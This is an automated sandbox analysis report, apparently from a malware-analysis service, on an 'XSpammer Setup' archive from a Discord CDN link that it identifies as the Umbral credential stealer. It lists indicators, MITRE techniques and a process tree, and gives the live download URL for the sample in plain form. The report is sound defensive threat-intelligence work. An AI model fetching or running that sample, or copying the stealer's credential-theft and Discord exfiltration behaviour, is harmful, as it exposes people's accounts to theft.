umbral | hxxps://cdn[.]discordapp[.]com/attachments/1221624037218979871/1233171393697419264/XSpammer_Setup[.]rar?ex=662c1fdb&is=662ace5b&hm=3c540bfb55da626be833e4e95546e3f675c5c7f630c08bb04c5cfffa0db0c08b&

Analysis

max time kernel
1199s
max time network
1176s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
25-04-2024 21:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1221624037218979871/1233171393697419264/XSpammer_Setup.rar?ex=662c1fdb&is=662ace5b&hm=3c540bfb55da626be833e4e95546e3f675c5c7f630c08bb04c5cfffa0db0c08b&

Score

10^/10

umbral discovery spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000500000001e7c1-251.dat	family_umbral
behavioral1/memory/5312-256-0x0000025ABE7E0000-0x0000025ABE820000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Qwryfbmksj.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	XSpammer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	XSpammer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	XSpammer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	XSpammer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	XSpammer Setup.exe

Executes dropped EXE 12 IoCs

pid	Process
3064	XSpammer Setup.exe
1792	Vofcecisbnvyq.exe
5312	Qwryfbmksj.exe
5096	XSpammer.exe
3092	XSpammer.exe
3276	XSpammer.exe
1700	XSpammer.exe
5412	XSpammer.exe
4948	XSpammer.exe
1140	XSpammer.exe
4992	XSpammer.exe
716	XSpammer.exe

Loads dropped DLL 26 IoCs

pid	Process
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
5096	XSpammer.exe
3092	XSpammer.exe
3092	XSpammer.exe
3092	XSpammer.exe
3092	XSpammer.exe
3276	XSpammer.exe
1700	XSpammer.exe
5412	XSpammer.exe
4948	XSpammer.exe
1140	XSpammer.exe
4992	XSpammer.exe
4948	XSpammer.exe
4948	XSpammer.exe
4948	XSpammer.exe
716	XSpammer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
191	discord.com
192	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
161	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	XSpammer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	XSpammer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	XSpammer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	XSpammer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	XSpammer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	XSpammer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	XSpammer.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5220	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\State = "0"	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\UserEnabledStartupOnce = "0"	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3400	msedge.exe
3400	msedge.exe
4656	msedge.exe
4656	msedge.exe
4360	identity_helper.exe
4360	identity_helper.exe
5316	msedge.exe
5316	msedge.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
1792	Vofcecisbnvyq.exe
2860	taskmgr.exe
2860	taskmgr.exe
5312	Qwryfbmksj.exe
5312	Qwryfbmksj.exe
5992	powershell.exe
5992	powershell.exe
5992	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5236	powershell.exe
5236	powershell.exe
5236	powershell.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
3088	taskmgr.exe
3088	taskmgr.exe
1700	XSpammer.exe
1700	XSpammer.exe
3276	XSpammer.exe
3276	XSpammer.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe
4452	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4452	taskmgr.exe
1924	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5756	7zG.exe
Token: 35	5756	7zG.exe
Token: SeSecurityPrivilege	5756	7zG.exe
Token: SeSecurityPrivilege	5756	7zG.exe
Token: SeDebugPrivilege	5312	Qwryfbmksj.exe
Token: SeSecurityPrivilege	1792	Vofcecisbnvyq.exe
Token: SeIncreaseQuotaPrivilege	3440	wmic.exe
Token: SeSecurityPrivilege	3440	wmic.exe
Token: SeTakeOwnershipPrivilege	3440	wmic.exe
Token: SeLoadDriverPrivilege	3440	wmic.exe
Token: SeSystemProfilePrivilege	3440	wmic.exe
Token: SeSystemtimePrivilege	3440	wmic.exe
Token: SeProfSingleProcessPrivilege	3440	wmic.exe
Token: SeIncBasePriorityPrivilege	3440	wmic.exe
Token: SeCreatePagefilePrivilege	3440	wmic.exe
Token: SeBackupPrivilege	3440	wmic.exe
Token: SeRestorePrivilege	3440	wmic.exe
Token: SeShutdownPrivilege	3440	wmic.exe
Token: SeDebugPrivilege	3440	wmic.exe
Token: SeSystemEnvironmentPrivilege	3440	wmic.exe
Token: SeRemoteShutdownPrivilege	3440	wmic.exe
Token: SeUndockPrivilege	3440	wmic.exe
Token: SeManageVolumePrivilege	3440	wmic.exe
Token: 33	3440	wmic.exe
Token: 34	3440	wmic.exe
Token: 35	3440	wmic.exe
Token: 36	3440	wmic.exe
Token: SeIncreaseQuotaPrivilege	3440	wmic.exe
Token: SeSecurityPrivilege	3440	wmic.exe
Token: SeTakeOwnershipPrivilege	3440	wmic.exe
Token: SeLoadDriverPrivilege	3440	wmic.exe
Token: SeSystemProfilePrivilege	3440	wmic.exe
Token: SeSystemtimePrivilege	3440	wmic.exe
Token: SeProfSingleProcessPrivilege	3440	wmic.exe
Token: SeIncBasePriorityPrivilege	3440	wmic.exe
Token: SeCreatePagefilePrivilege	3440	wmic.exe
Token: SeBackupPrivilege	3440	wmic.exe
Token: SeRestorePrivilege	3440	wmic.exe
Token: SeShutdownPrivilege	3440	wmic.exe
Token: SeDebugPrivilege	3440	wmic.exe
Token: SeSystemEnvironmentPrivilege	3440	wmic.exe
Token: SeRemoteShutdownPrivilege	3440	wmic.exe
Token: SeUndockPrivilege	3440	wmic.exe
Token: SeManageVolumePrivilege	3440	wmic.exe
Token: 33	3440	wmic.exe
Token: 34	3440	wmic.exe
Token: 35	3440	wmic.exe
Token: 36	3440	wmic.exe
Token: SeDebugPrivilege	2860	taskmgr.exe
Token: SeSystemProfilePrivilege	2860	taskmgr.exe
Token: SeCreateGlobalPrivilege	2860	taskmgr.exe
Token: SeDebugPrivilege	5992	powershell.exe
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeDebugPrivilege	5236	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	3088	taskmgr.exe
Token: SeSystemProfilePrivilege	3088	taskmgr.exe
Token: SeCreateGlobalPrivilege	3088	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	3272	wmic.exe
Token: SeSecurityPrivilege	3272	wmic.exe
Token: SeTakeOwnershipPrivilege	3272	wmic.exe
Token: SeLoadDriverPrivilege	3272	wmic.exe
Token: SeSystemProfilePrivilege	3272	wmic.exe
Token: SeSystemtimePrivilege	3272	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
5756	7zG.exe
4656	msedge.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
2860	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe
3088	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4656 wrote to memory of 4388	4656	msedge.exe	84
PID 4656 wrote to memory of 4388	4656	msedge.exe	84
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 1476	4656	msedge.exe	85
PID 4656 wrote to memory of 3400	4656	msedge.exe	86
PID 4656 wrote to memory of 3400	4656	msedge.exe	86
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87
PID 4656 wrote to memory of 5024	4656	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1221624037218979871/1233171393697419264/XSpammer_Setup.rar?ex=662c1fdb&is=662ace5b&hm=3c540bfb55da626be833e4e95546e3f675c5c7f630c08bb04c5cfffa0db0c08b&
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9675246f8,0x7ff967524708,0x7ff967524718
  2⤵
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:60
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,5143937484451566312,6043679107844440557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:528

